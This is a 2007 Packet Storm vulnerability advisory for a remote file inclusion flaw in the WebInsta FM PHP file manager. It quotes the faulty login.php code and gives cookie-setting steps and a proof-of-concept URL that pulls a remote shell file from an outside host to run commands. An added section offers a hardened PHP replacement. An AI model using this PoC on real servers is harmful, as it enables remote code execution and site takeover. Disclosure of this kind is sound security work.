webinsta-rfi.txt

2007-04-17T00:00:00
ID PACKETSTORM:55960
Type packetstorm
Reporter MurderSkillz
Modified 2007-04-17T00:00:00

Description

Program Title ################################################################################  
WebInsta FM <= 0.1.4 Remote File Inclusion Vulnerability  
  
Description ##################################################################################  
WebInsta FM is a basic web-based file manager, written in PHP, distributed by WebInsta.com.  
  
Vuln Code ####################################################################################  
In /admin/login.php:  
// isset() only tests that the two cookies exist; their values are never compared to anything here.  
if(isset($_COOKIE['adminname']) && isset($_COOKIE['adminpass'])){  
    $cusername = $_COOKIE['adminname'];  
    $cpassword = $_COOKIE['adminpass'];  
    // $absolute_path is not assigned anywhere before this line. With register_globals on,  
    // a ?absolute_path=... request parameter populates it, so the attacker picks the include prefix.  
    include($absolute_path."admin/checkpass.php");  
}  
  
Exploit ######################################################################################  
To reach the include() you must set two cookies. Only their presence is tested (isset()); their  
content is never examined, so any value will do. In Firefox they can be set with the AnEC  
Cookie Editor extension. The two cookies should be set as follows:  
  
NAME - adminname  
CONTENT - anything here  
HOST - current site (www.site.com)  
PATH - nothing  
  
NAME - adminpass  
CONTENT - anything here  
HOST - current site (www.site.com)  
PATH - nothing  
  
Once set, the PoC URL is as follows:  
http://site.com/path/to/files/admin/login.php?absolute_path=http://shell.com/shell.txt?cmd=ls  
  
Note the trailing "?": login.php appends "admin/checkpass.php" to $absolute_path, so the string PHP  
actually opens is http://shell.com/shell.txt?cmd=lsadmin/checkpass.php. The "?" pushes the appended  
path into the query string of the remote request, so shell.txt is still the file that is fetched  
and executed (the shell simply sees the concatenated string as the value of cmd).  
  
Note: register_globals must be ON (otherwise the query-string parameter never becomes  
$absolute_path) and the PHP instance must be allowed to open URLs in include()  
(allow_url_fopen, and from PHP 5.2 also allow_url_include). The original note also asks for  
Magic Quotes to be OFF; this particular payload contains no quotes or NUL bytes, so  
magic_quotes_gpc does not actually interfere with it.  
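The following is an added example, not code from WebInsta FM or from this advisory: a hardened  
stand-in for the login.php fragment shown under Vuln Code that closes the include path abused by  
the PoC above. It assumes login.php lives in <app-root>/admin/ next to checkpass.php; the helper  
name safe_include is an assumption as well.  

```php
<?php
// Added example (not WebInsta code): hardened stand-in for the
// $absolute_path include in /admin/login.php. Assumes login.php sits in
// <app-root>/admin/ and checkpass.php in the same directory.

// The include base is derived from this file's own location and is never
// read from the request, so register_globals (or any ?absolute_path=...
// parameter) cannot redirect it. Keep register_globals=Off and
// allow_url_include=Off in php.ini as well; the code should not rely on them.
$absolute_path = dirname(__DIR__) . DIRECTORY_SEPARATOR;

/**
 * Include a file only if it is on a fixed allow-list and its resolved path
 * stays inside $base. Rejects URLs, traversal (../) and symlinks that escape.
 */
function safe_include(string $base, string $relative): void
{
    static $allowed = ['admin/checkpass.php'];

    if (!in_array($relative, $allowed, true)) {
        throw new RuntimeException("include not permitted: $relative");
    }

    $root = realpath($base);
    $full = realpath($base . $relative);
    // realpath() returns false for non-existent paths and for stream wrappers
    // such as http://, so a remote target can never pass this check.
    if ($root === false || $full === false
        || strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("include escapes application root: $relative");
    }

    require $full;
}

// isset() only proves the cookies exist; the original code was satisfied by
// any two values at all. At minimum insist on non-empty strings here and let
// checkpass.php (now guaranteed to be the local file) verify them.
if (isset($_COOKIE['adminname'], $_COOKIE['adminpass'])
    && is_string($_COOKIE['adminname']) && $_COOKIE['adminname'] !== ''
    && is_string($_COOKIE['adminpass']) && $_COOKIE['adminpass'] !== '') {
    $cusername = $_COOKIE['adminname'];
    $cpassword = $_COOKIE['adminpass'];
    safe_include($absolute_path, 'admin/checkpass.php');
}
```

With this in place the absolute_path parameter in the PoC URL is simply ignored, and even a  
later bug that let an attacker influence $relative would be stopped by the allow-list and the  
realpath() containment check. The example only addresses the include flaw; whether a plaintext  
adminname/adminpass cookie pair is an acceptable authentication design is a separate question  
this advisory does not cover.  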
  
Script Download ##############################################################################  
http://webinsta.com/cgi-bin/axs/ax.pl?http://www.webinsta.com/downloads/webinstafm.zip  
  
Original Advisory ############################################################################  
http://g00ns-forum.net/  
  
Shouts #######################################################################################  
g00ns.net  
13337.org  
rezen.org  
  
By MurderSkillz & FiSh of g00ns.net